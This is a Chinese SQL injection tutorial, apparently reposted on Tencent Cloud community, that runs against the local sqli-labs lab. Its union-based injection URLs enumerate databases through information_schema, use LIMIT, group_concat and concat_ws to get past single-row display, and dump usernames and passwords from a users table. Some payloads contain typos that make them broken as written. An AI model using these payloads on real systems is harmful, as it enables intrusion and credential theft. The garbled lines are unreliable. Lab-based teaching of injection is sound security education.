SQL最易懂系列教程

上节内容我们讲了union联合查询注入的大致步骤,在第5步查询数据库中的表,第6步查询表中的字段名我们用到一些查询语句这里我们进一步说明一下。

1.在MYSQL数据库安装好以后,就已经内置了几个

其中MYSQL内置的information_schema数据库,它功能强大,是我们进行MYSQL注入的基石。

通过information_schema我们可以窥透整个MYSQL的运行状况,也可以查看到数据中的所有信息。

2.查询数据核心语法

提示:所有类型的SQL注入,都是基于查库、表、列语句。

3.如果查询出来的结果太多,页面上无法显示查询结果,我们有如下的解决方法。

我们以sqli-labs环境作为演示。

我们输入如下图语句查询有哪些库

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(select schema_name from information_schema.schemata)--+

结果显示:超过一行无法显示。

我们这里介绍第一种方法

这里我们先介绍下函数limit

limit [偏移量],[数量]

偏移量也是从0开始(和c语言数组是一个道理),数量是选取多少个数据项。

常见作用:

当某些页面只能回显特定个数的数据时,可以用limit进行限制

例如:我们在查询语句中后加上 limit 0,1

输入查询语句:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(select schema_name from information_schema.schemata limit 0,1)--+

显示了第一个数据库information_schema

我们在查询语句中后加上 limit 1,1

输入查询语句:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(select schema_name from information_schema.schemata limit 1,1)--+

显示了第2个数据库challenges,以此类推,查完所有的数据。

我们这里介绍第二种方法

这里我们先介绍三个函数

concat():没有分割符的连接字符串

concat_ws():含有分隔符的连接字符串

group_concat():连接一个组的所有字符串,并以逗号分割每一条数据

我们在查询语句中加上:group_concat

输入查询语句:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(selectgruop_concat(schema_name)from information_schema.schemata)--+

所有结果在一行显示

接下来我们查询用户名密码

输入查询语句:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(select group_concat(username,password) from security.users)--+

所有用户名和密码都显示出来了,我们发现账号和密码连接到一起,分不清各是多少。

这里就需要用到concat_ws函数了

我们输入:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(selectconcat_ws('-',username,password) from security.users limit 0,1)--+

这里要加 limit 0,1不然显示不出来。

那我们既想把用户名和密码分隔开,又想一次性显示出来怎么办

我们输入下面语句:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(selectgroup_concat(username,'-',password)from security.users)--+

这里用户名和密码都显示出来了,而且用户名和密码用—隔开便于识别。

注意:

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180623G0GYZL00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

同媒体快讯

扫码关注云+社区

领取腾讯云代金券